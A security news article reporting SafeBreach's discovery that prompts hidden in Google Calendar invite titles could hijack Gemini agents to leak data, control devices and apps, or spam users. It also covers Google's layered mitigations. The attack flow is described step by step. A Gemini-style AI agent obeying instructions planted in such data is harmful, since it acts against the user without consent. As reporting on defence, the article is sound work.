Researchers discovered a major security flaw in Google Calendar that could allow hijacking Gemini agents via malicious invites. Google patched the flaw following the bug report, ensuring users’ security.
Malicious Invites Could Exploit Google Calendar Flaw To Leak Data
Researchers from SafeBreach discovered a serious vulnerability in Google Calendar that could risk users’ security. As elaborated in their blog post, the security flaw could allow an attacker to hijack Gemini agents on the target device via maliciously crafted Google Calendar invites. In turn, this would allow the attacker to access sensitive data via Gemini without requiring user interaction.
Briefly, the attack begins when the attacker sends a malicious Calendar invite to the target user. The attack involves embedding the malicious prompt within the invite’s event title, so it can be pulled up after the target user asks Gemini about the calendar invites.
As Gemini executes the malicious prompt, considering it a part of the context, it would perform the required malicious action without identifying the intent. This prompt could require any malicious function from the attacker, such as meddling with Calendar events, extracting the user’s IP address via a URL, or interacting with other agents, such as Google Home, Messages, Phone, or other applications like Zoom, performing various activities, like joining a call or fetching data, without user input.
The following diagram illustrates the attack flow.
Source: SafeBreach
In their study, the researchers demonstrated “context poisoning” – a technique where the LLM is tricked into considering the entire conversation history by sending one query at a time. Injecting a malicious instruction into a long conversation would trick the model into executing the activity. The researchers conducted various types of attacks this way, such as spamming the user, generating hateful content, invoking tools and apps, visiting URLs, and exfiltrating data.
Google Deployed Mitigations
Following the researchers’ report, Google acknowledged their efforts and deployed mitigation strategies to prevent promptware attacks. According to their blog post published in June 2025, Google strengthened the latest Gemini models (v2.5 and later) with layered defense strategies to prevent promptware. These include:
- Prompt injection content classifiers: The model analyzes the instructions and avoids responding to malicious instructions.
- Security thought reinforcement: In case of detecting partial instructions as malicious, such as in prompt injection attacks, the model only focuses on the task, ignoring malicious instructions.
- Markdown sanitization and suspicious URL redaction: The model analyzes external URLs and removes them from the output upon detecting malicious links.
- User confirmation framework: For instructions including suspicious actions, like deleting Calendar events, the model asks for user confirmation before performing the action.
- End-user security mitigation notifications: Users receive notifications highlighting Gemini’s activities upon detecting potentially malicious elements, such as the removal of suspicious URLs.
Promptware Threats Are Rising
The report from SafeBreach, according to the researchers, doesn’t specifically apply to Gemini. Instead, it indicates the widespread impact of the rising threat in the cybersecurity world – promptware. As AI usage becomes common, promptware threats gain even more importance for timely mitigation.
Nonetheless, SafeBreah isn’t the first to point out this threat. In 2024, a team of researchers shared a detailed research paper about promptware threats impacting generative AI apps. The researchers also proposed various mitigation strategies to avoid these threats.
Let us know your thoughts in the comments.
